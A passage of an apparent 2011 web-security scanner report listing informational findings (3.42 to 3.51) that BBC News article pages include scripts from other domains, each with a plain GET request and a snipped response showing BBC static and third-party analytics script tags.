3.42. http://www.bbc.co.uk/news/world-europe-12432879  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-europe-12432879

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-europe-12432879 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:17 GMT
Keep-Alive: timeout=10, max=719
Expires: Sat, 12 Feb 2011 02:03:17 GMT
Connection: close
Set-Cookie: BBC-UID=348d65a5ee0aa6851ada3716d15112b99db0e0cd40a04139fbfbc3ce3e6b2c9e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=348d65a5ee0aa6851ada3716d15112b99db0e0cd40a04139fbfbc3ce3e6b2c9e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:17 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.43. http://www.bbc.co.uk/news/world-latin-america-12427051  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12427051

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-latin-america-12427051 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:18 GMT
Keep-Alive: timeout=10, max=782
Expires: Sat, 12 Feb 2011 02:03:18 GMT
Connection: close
Set-Cookie: BBC-UID=d42d05555eea7676ca1f6c97e1e64e37e63a7703f070717a947b1a74e68cd0f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=d42d05555eea7676ca1f6c97e1e64e37e63a7703f070717a947b1a74e68cd0f40Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:18 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56980

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.44. http://www.bbc.co.uk/news/world-latin-america-12427057  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12427057

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-latin-america-12427057 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=732
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=a48d65b59e2ab6d889ad674e719941ff211ada7af020d14ad45b5a1402accb4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a48d65b59e2ab6d889ad674e719941ff211ada7af020d14ad45b5a1402accb4a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 56004

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.45. http://www.bbc.co.uk/news/world-latin-america-12436213  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-latin-america-12436213

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-latin-america-12436213 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:20 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:20 GMT
Connection: close
Set-Cookie: BBC-UID=844da5e5fe3aa6e88beb58abb1c5e39a3b1c63a6506081399b5bf2cdd4bfc14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=844da5e5fe3aa6e88beb58abb1c5e39a3b1c63a6506081399b5bf2cdd4bfc14e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:20 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57653

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.46. http://www.bbc.co.uk/news/world-middle-east-12435798  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12435798

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12435798 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=800
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=840de5458e0a669a2f00d7c15140889c13c08ab3207071aa64ab3a65b1b1ea3e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=840de5458e0a669a2f00d7c15140889c13c08ab3207071aa64ab3a65b1b1ea3e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 71999

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.3//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.47. http://www.bbc.co.uk/news/world-middle-east-12437440  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437440

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12437440 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=749
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=440dd505cefa06fa0a8ded07d16f6bfabc3115f5606051998b2b839ea0ae14cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=440dd505cefa06fa0a8ded07d16f6bfabc3115f5606051998b2b839ea0ae14cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61102

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.48. http://www.bbc.co.uk/news/world-middle-east-12437881  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437881

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12437881 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=772
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=040dd5357e4a265ada964c4181ee2923d6616f8860b07129eb4bc21a76fc24460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=040dd5357e4a265ada964c4181ee2923d6616f8860b07129eb4bc21a76fc24460Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.49. http://www.bbc.co.uk/news/world-middle-east-12437912  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437912

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12437912 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=786
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=041d45e5ee7ae67aab692016e1005e55bf1ff6c570b0c1391b2bf34f0bb4d20e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=041d45e5ee7ae67aab692016e1005e55bf1ff6c570b0c1391b2bf34f0bb4d20e0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61208

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.50. http://www.bbc.co.uk/news/world-middle-east-12437922  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-middle-east-12437922

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-middle-east-12437922 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:22 GMT
Keep-Alive: timeout=10, max=794
Expires: Sat, 12 Feb 2011 02:03:22 GMT
Connection: close
Set-Cookie: BBC-UID=947d65a58e9ad6aab9a8c7c301344e7a548a1aef40f07149db5bf35491441aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=947d65a58e9ad6aab9a8c7c301344e7a548a1aef40f07149db5bf35491441aae0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:22 GMT; path=/; domain=bbc.co.uk;
Content-Length: 61132

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
<!-- SiteCatalyst code version: H.21.
Copyright 1996-2010 Adobe, Inc. All Rights Reserved
More info available at http://www.omniture.com -->
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_45/s_code.js"></script>
...[SNIP]...

3.51. http://www.bbc.co.uk/news/world-south-asia-12427513  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bbc.co.uk
Path:   /news/world-south-asia-12427513

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /news/world-south-asia-12427513 HTTP/1.1
Host: www.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Sat, 12 Feb 2011 02:03:23 GMT
Keep-Alive: timeout=10, max=752
Expires: Sat, 12 Feb 2011 02:03:23 GMT
Connection: close
Set-Cookie: BBC-UID=c4cd7585ae7ae6db6bea4283111dcbb8b54359d890e021dad4bb1a94a19cf2cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=c4cd7585ae7ae6db6bea4283111dcbb8b54359d890e021dad4bb1a94a19cf2cc0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Sun, 12-Feb-12 02:03:23 GMT; path=/; domain=bbc.co.uk;
Content-Length: 58085

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.bbc.co.uk/frameworks/barlesque/1.6.0//desktop/3/style/main.css" /> <script type="text/javascript" src="http://node1.bbcimg.co.uk/glow/gloader.0.1.4.js"> gloader.use("glow", {map: "http://node1.bbcimg.co.uk/glow/glow/map.1.7.3.js"}); </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/locationservices/locator/v4_0/locator.js"></script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/core/3_2/bbc_fmtj.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://news.bbcimg.co.uk/js/common/3_2/bbc_fmtj_common.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://news.bbcimg.co.uk/js/config/apps/4_4/bbc_fmtj_config.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://news.bbcimg.co.uk/js/app/bbccom/19_46/bbccom.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=J08781"></script>
...[SNIP]...
</script>
